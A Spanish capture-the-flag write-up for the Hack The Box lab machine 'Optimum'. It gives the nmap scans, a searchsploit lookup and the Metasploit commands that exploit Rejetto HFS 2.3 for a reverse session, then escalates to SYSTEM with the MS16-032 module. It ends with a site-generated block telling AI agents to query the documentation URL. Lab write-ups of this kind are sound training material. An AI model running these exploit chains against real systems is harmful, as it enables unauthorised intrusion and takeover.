# Optimum

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.10.8
```

para verificar la conectividad de red.

<figure><img src="/files/1j8P4Jr0tS1mSavxuWKR" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sC -sV 10.10.10.8
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="/files/7fASQ4vFbsVHUPifIwF6" alt=""><figcaption></figcaption></figure>

Durante el escaneo se identificaron los siguientes puertos abiertos:

* **Puerto 80 (HTTP):** Este puerto generalmente está asociado a servidores web. Si el servicio está ejecutando un servidor web como Apache, Nginx o IIS, es recomendable buscar vulnerabilidades conocidas relacionadas con el software y versiones en uso (por ejemplo, a través de CVEs). Además, es importante realizar pruebas de seguridad en las aplicaciones web que se ejecutan en el servidor, como inyecciones SQL, Cross-Site Scripting (XSS) o vulnerabilidades de escalada de privilegios.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p80 -v 10.10.10.8
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="/files/Pc47u0xpFGa5uAiG5bM5" alt=""><figcaption></figcaption></figure>

Buscamos exploits sobre esa versión.

```bash
searchsploit HFS 2.3
```

<figure><img src="/files/HqNd0JRQUYIE4iQpljXJ" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Explotamos a través de Metasploit.

```bash
use windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set LHOST 10.10.14.7
run
background
```

Estamos dentro del Usuario Kostas por lo que podemos conseguir la flag del user. Buscamos a través de Metasploit que exploit nos recomienda.

### 🔐 **PRIVILEGIOS**

```bash
use multi/recon/local_exploit_suggerster
```

Descubrimos uno que nos llama la atención para explotarlo.

{% embed url="<https://www.rapid7.com/db/modules/exploit/windows/local/ms16_032_secondary_logon_handle_privesc/>" %}

```bash
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set LHOST 10.10.14.7 
set session 1  
exploit
```

<figure><img src="/files/7I4CLR0vtNa44tnOzDQw" alt=""><figcaption></figcaption></figure>

```bash
getuid
```

<figure><img src="/files/LM2LcYzM8UO96ebMPBcN" alt=""><figcaption></figcaption></figure>

Ya somos **root**.

<figure><img src="/files/jQa3Ifw5VLcSX18PA8gP" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://beafn28.gitbook.io/beafn28/writeups/hackthebox/optimum.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.